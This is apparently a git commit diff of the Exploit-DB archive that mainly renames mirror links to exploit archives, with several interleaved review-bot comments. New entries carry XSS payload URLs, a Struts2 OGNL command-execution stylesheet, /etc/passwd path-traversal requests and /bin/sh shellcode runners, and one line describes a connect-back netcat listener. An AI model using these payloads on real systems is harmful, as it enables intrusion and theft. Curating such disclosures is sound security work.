DB: 2015-05-15
17 new exploits
parent
c9501aad62
commit
b3321b3426
343 changed files with 855 additions and 616 deletions
|
@ -1,6 +1,6 @@
|
|||
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
|
||||
|
||||
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-08-18]
|
||||
|
|
|
@ -10,7 +10,7 @@
|
|||
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
|
||||
# A similar exploitation vector was also added lately in Padbuster v0.3:
|
||||
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15213.pl (padBuster.pl)
|
||||
#
|
||||
#
|
||||
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
|
||||
|
|
13
platforms/asp/webapps/37015.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/52730/info
|
||||
|
||||
Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b
|
||||
|
||||
http://www.example.com/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b
|
||||
|
||||
http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT>
|
||||
|
||||
http://www.example.com/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0
|
|
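Review bot: `platforms/asp/webapps/37015.txt` is added as an executable file although it is a plain-text advisory containing only a description and sample URLs. The executable bit serves no purpose on a `.txt` entry and should be dropped before merging; the other new entries in this commit that show `Executable file` need the same correction.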
@ -15,7 +15,7 @@
|
|||
|
||||
# for working with this exploit you need two asp file for updating hash you can download both from :
|
||||
# www.abysssec.com/files/dana.zip
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8719.zip (2009-dana.zip)
|
||||
|
||||
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
|
||||
|
||||
|
|
|
@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
|
|||
improper handling of environment variables.
|
||||
|
||||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12090.pdf (cybsec_advisory_2010_0404.pdf)
|
|
@ -14,4 +14,4 @@ Vulnerability Description:
|
|||
Some files that allow to obtain usernames and other internal information can be read by any user inside
|
||||
the CLI.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12091.pdf (cybsec_advisory_2010_0403.pdf)
|
|
@ -196,7 +196,7 @@ Kingcope
|
|||
A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.
|
||||
|
||||
the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17462.tar.gz (ssh_0day.tar.gz)
|
||||
|
||||
run like ./ssh -1 -z <yourip> <target>
|
||||
setup a netcat, port 443 on yourip first
|
||||
|
|
|
@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
|
|||
/Signed "the awesome" Kingcope
|
||||
|
||||
Code:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18181.tar (7350roaringbeastv3.tar)
|
||||
|
||||
|
|
|
@ -15,4 +15,4 @@ improper profile check.
|
|||
===========
|
||||
Download:
|
||||
===========
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf)
|
|
@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com
|
|||
===============
|
||||
Download
|
||||
===============
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Sony_Ericsson.rar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11043.rar (Sony_Ericsson.rar)
|
|
@ -15,4 +15,4 @@ Users inside the CLI can run some kind of “Fork Bomb” in order to saturate s
|
|||
of an insecure ulimit value.
|
||||
|
||||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0401.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12093.pdf (cybsec_advisory_2010_0401.pdf)
|
|
@ -1,3 +1,3 @@
|
|||
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/savysoda_poc.xls
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13823.xls (savysoda_poc.xls)
|
|
@ -1,3 +1,3 @@
|
|||
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/office2_poc.xls
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13824.xls (office2_poc.xls)
|
|
@ -1,3 +1,3 @@
|
|||
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/goodreader_poc.xls
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13825.xls (goodreader_poc.xls)
|
|
@ -27,7 +27,7 @@ POC/EXPLOIT
|
|||
you can open this url with the browser or send mms with this image.
|
||||
|
||||
http://es.geocities.com/jplopezy/nokiacrash.jpg
|
||||
alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-nokiacrash.jpg
|
||||
alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8013.jpg (2009-nokiacrash.jpg)
|
||||
|
||||
------------------------------------------------------
|
||||
Juan Pablo Lopez Yacubian
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# V100R001B121Telmex
|
||||
# Exploit Download Link:
|
||||
# http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HG520_udpinfo.tar.gz
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12298.tar.gz (HG520_udpinfo.tar.gz)
|
||||
|
||||
|
||||
By sending a specially crafted UDP packet you can remotely obtain the
|
||||
|
|
|
@ -7,6 +7,6 @@
|
|||
# Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
|
||||
# CVE : No CVE US-CERT VU#723755
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/reaver-1.1.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18291.tar.gz (reaver-1.1.tar.gz)
|
||||
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07182006-btvoyager.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2034.tgz (07182006-btvoyager.tgz)
|
||||
|
||||
# milw0rm.com [2006-07-18]
|
||||
|
|
|
@ -22,10 +22,12 @@ A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
|
|||
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
|
||||
their work that helped make this happen. You can visit the dev team's
|
||||
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
|
||||
|
||||
EDB Note: Old filename: 10112007-iphone.tif
|
||||
-->
|
||||
|
||||
<html>
|
||||
<img src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10112007-iphone.tif">
|
||||
<img src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4522.tif">
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2007-10-11]
|
||||
|
|
|
@ -197,7 +197,7 @@ name="backdoor">
|
|||
|
||||
Proof-of-concept brute force tool available at
|
||||
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Louhi_CMC-brute_090323.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip)
|
||||
|
||||
|
||||
Other information:
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
The pdf is located at:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lynn-cisco.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13294.pdf (lynn-cisco.pdf)
|
||||
|
||||
/str0ke
|
||||
|
||||
|
|
|
@ -16,5 +16,5 @@ firmware versions have been confirmed to date:
|
|||
Detailed description available here:
|
||||
http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf
|
||||
|
||||
POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hnap0wn.tar.gz
|
||||
POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11101.tar.gz (hnap0wn.tar.gz)
|
||||
|
||||
|
|
|
@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti
|
|||
logged-in user.
|
||||
|
||||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0402.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092.pdf (cybsec_advisory_2010_0402.pdf)
|
|
@ -1,3 +1,3 @@
|
|||
The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ios_pdf_exploit.7z
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14538.7z (ios_pdf_exploit.7z)
|
9
platforms/java/webapps/37006.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/52672/info
|
||||
|
||||
Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Minify 2.1.3 and 2.1.4-beta are vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.exmaple.com/min/builder/#g=[XSS]
|
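Review bot: the sample URL on the last line of 37006.txt uses the host `www.exmaple.com`, a misspelling of the `www.example.com` placeholder that the other new entries in this commit use. `exmaple.com` is not a reserved documentation name, so the advisory ends up pointing at a real, unrelated host; change it to `www.example.com`.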
21
platforms/java/webapps/37009.xml
Executable file
|
@ -0,0 +1,21 @@
|
|||
source: http://www.securityfocus.com/bid/52702/info
|
||||
|
||||
Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8" ?>
|
||||
<xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform"
|
||||
version="1.0" xmlns:ognl="ognl.Ognl">
|
||||
<xsl:template match="/">
|
||||
<html>
|
||||
<body>
|
||||
<h2>hacked by kxlzx</h2>
|
||||
<h2>http://www.example.com</h2>
|
||||
<exp>
|
||||
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
|
||||
</exp>
|
||||
</body>
|
||||
</html>
|
||||
</xsl:template>
|
||||
</xsl:stylesheet>
|
|
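Review bot: 37009.xml opens with the plain-text `source:` line and the vulnerability description, and the `<?xml version="1.0" encoding="UTF-8" ?>` declaration only appears after them, so the file is not well-formed XML despite its extension. Either store the entry as `.txt` like the other advisories added in this commit, or move the header text into an XML comment placed below the declaration.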
@ -52,10 +52,10 @@ _start:
|
|||
int
|
||||
main(void)
|
||||
{
|
||||
char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56=
|
||||
\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
|
||||
char *shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
|
||||
"\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
|
||||
|
||||
printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
|
||||
printf("strlen(shellcode)=%d\n", strlen(shellcode));
|
||||
|
||||
((void (*)(void))shellcode)();
|
||||
|
||||
|
|
|
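Review bot: in the corrected line `printf("strlen(shellcode)=%d\n", strlen(shellcode));` the argument is a `size_t` but the conversion is `%d`, which is a type mismatch wherever `size_t` is wider than `int`. Since the line is already being rewritten to remove the quoted-printable `=3D` residue, switch the conversion to `%zu` in the same change.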
@ -1,5 +1,5 @@
|
|||
# linux/x86 xor-encoded Connect Back Shellcode 371 bytes
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13366.tar.gz (black-RXenc-con-back.tar.gz)
|
||||
|
||||
# milw0rm.com [2006-04-18]
|
|
@ -49,12 +49,12 @@ _start:
|
|||
int
|
||||
main(void)
|
||||
{
|
||||
char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68=
|
||||
\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
|
||||
char *shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68"
|
||||
"\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
|
||||
|
||||
printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
|
||||
printf("strlen(shellcode)=%d\n", strlen(shellcode));
|
||||
|
||||
((void (*)(void))shellcode)();
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
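Review bot: the closing `}` at the end of this hunk is listed as both removed and added with no visible difference, which points to a whitespace-only or end-of-file newline change riding along with the quoted-printable cleanup. Confirm that it is intended, or drop it so the hunk only contains the `=3D` and soft-line-break fixes.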
@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
|
|||
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
|
|
@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi
|
|||
|
||||
Expat 2.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-1.gz (2009-11-22-36097.gz)
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-2.gz (2009-11-22-36097-2.gz)
|
|
@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera
|
|||
Versions up to and including libTIFF 3.9.4 are vulnerable.
|
||||
|
||||
PoC:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14573.tif.gz (lp589145-sample.tif.gz)
|
|
@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki
|
|||
|
||||
--
|
||||
http://pi3.com.pl
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)
|
||||
http://blog.pi3.com.pl/?p=277
|
||||
|
|
|
@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
|
|||
|
||||
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
|
||||
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
|
||||
|
||||
...
|
||||
$ strings strings-bfd-badptr2
|
||||
|
|
|
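Review bot: the `EDB Mirror:` line now points at `35081.bin` but, unlike most renamed mirrors in this commit, carries no parenthetical with the original name, while the surrounding commands still refer to `strings-bfd-badptr2`. Add `(strings-bfd-badptr2)` after the new URL so a reader who fetches the mirror copy can match it to the `strings` invocation shown below it.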
@ -24,6 +24,6 @@ X Protocol Version 11, Revision 0, Release 7.0
|
|||
r00t # id
|
||||
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...
|
||||
|
||||
# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/xmodulepath.tgz
|
||||
# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1596.tgz (xmodulepath.tgz)
|
||||
|
||||
# milw0rm.com [2006-03-20]
|
||||
|
|
|
@ -9,7 +9,7 @@ that data is overwritten again correctly by a program' function).
|
|||
.bss section is in higher addresses than .dtors section, so, we
|
||||
can't hijack .dtors to....
|
||||
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05262006-tiffspl33t.tar.gz
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz)
|
||||
|
||||
nitr0us <nitrousenador[at]gmail[dot]com>
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
//
|
||||
// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2014-5119.tar.gz
|
||||
// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34421.tar.gz (CVE-2014-5119.tar.gz)
|
||||
//
|
||||
//
|
||||
// ---------------------------------------------------
|
||||
|
|
|
@ -10,7 +10,7 @@ but disabling it is a matter of running setenforce 0 as root.
|
|||
|
||||
|
||||
Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/redstarroot.rpm
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35749.rpm (redstarroot.rpm)
|
||||
|
||||
|
||||
## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04132007-pr0ftpd_modctrls.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz)
|
||||
|
||||
# milw0rm.com [2007-04-13]
|
||||
|
|
|
@ -3,6 +3,6 @@ PostgreSQL UDF for command execution
|
|||
[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html
|
||||
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz
|
||||
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_postgresqludf_sys_0.0.1.tar.gz
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-01-25]
|
||||
|
|
|
@ -3,6 +3,6 @@ MySQL UDF for command execution
|
|||
[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
|
||||
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
|
||||
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-01-25]
|
||||
|
|
|
@ -301,6 +301,6 @@
|
|||
|
||||
http://grsecurity.net/~spender/cheddar_bay.tgz
|
||||
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-cheddar_bay.tgz
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9191.tgz (2009-cheddar_bay.tgz)
|
||||
|
||||
# milw0rm.com [2009-07-17]
|
||||
|
|
|
@ -50,6 +50,6 @@ i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz
|
|||
GenuineIntel GNU/Linux
|
||||
------------------------------------
|
||||
|
||||
download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-pulseaudio-exp.tar.gz
|
||||
download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-07-20]
|
||||
|
|
|
@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
|
|||
*/
|
||||
|
||||
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-wunderbar_emporium.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
@ -4,6 +4,6 @@
|
|||
Quick and dirty exploit for this one:
|
||||
|
||||
http://www.frasunek.com/proto_ops.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-proto_ops.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
@ -16,6 +16,6 @@
|
|||
*/
|
||||
|
||||
main: http://grsecurity.net/~spender/therebel.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-therebel.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz (2009-therebel.tgz)
|
||||
|
||||
# milw0rm.com [2009-09-02]
|
||||
|
|
|
@ -5,6 +5,6 @@ systems, it automatically searches in the SELinux policy rules for
|
|||
types with mmap_zero permission it can transition, and tries to exploit
|
||||
the system with that types.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage2.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-09-09]
|
||||
|
|
|
@ -37,6 +37,6 @@
|
|||
*/
|
||||
|
||||
http://www.grsecurity.net/~spender/enlightenment.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-enlightenment.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9627.tgz (2009-enlightenment.tgz)
|
||||
|
||||
# milw0rm.com [2009-09-10]
|
||||
|
|
|
@ -4,6 +4,6 @@ pointer workaround for data items addressing on ppc64 (i.e. functions
|
|||
on exploit code and libc can be referenced); Improved search and
|
||||
transition to SELinux types with mmap_zero permission.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage3.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-09-11]
|
||||
|
|
|
@ -2,6 +2,6 @@
|
|||
# solareclipse at phreedom dot org
|
||||
# GPG key ID: E36B11B7
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12262006-proftpd-not-pro-enough.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz)
|
||||
|
||||
# milw0rm.com [2003-10-15]
|
||||
|
|
13
platforms/linux/remote/37007.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/52684/info
|
||||
|
||||
AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to obtain sensitive information, upload arbitrary code, and run it in the context of the webserver process.
|
||||
|
||||
Atmail 1.04 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&Attachment[]=/../../../../../../../../../etc/passwd
|
||||
|
||||
https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd
|
||||
|
||||
https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html
|
|
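Review bot: this entry is filed under `platforms/linux/remote/`, yet every sample request in it targets a PHP page of a web application (`compose.php`, `mime.php`) and the description speaks of code running in the context of the webserver process. The other three advisories added in this commit sit under a `webapps` directory; move 37007.txt to the matching `webapps` category so it is found alongside them.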
@ -52,6 +52,6 @@
|
|||
**
|
||||
*/
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-x2_fc6f7f8.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz)
|
||||
|
||||
# milw0rm.com [2008-04-06]
|
||||
|
|
|
@ -17,7 +17,7 @@
|
|||
# Autor: hitz - WarCat team (warcat.no-ip.org)
|
||||
# Collaborator: pretoriano
|
||||
#
|
||||
# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||
#
|
||||
# 2. Extract it to a directory
|
||||
#
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ximage_zgv.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz)
|
||||
|
||||
# milw0rm.com [2004-10-28]
|
||||
|
|
|
@ -36,6 +36,6 @@ struct versions vers[VERSN] =
|
|||
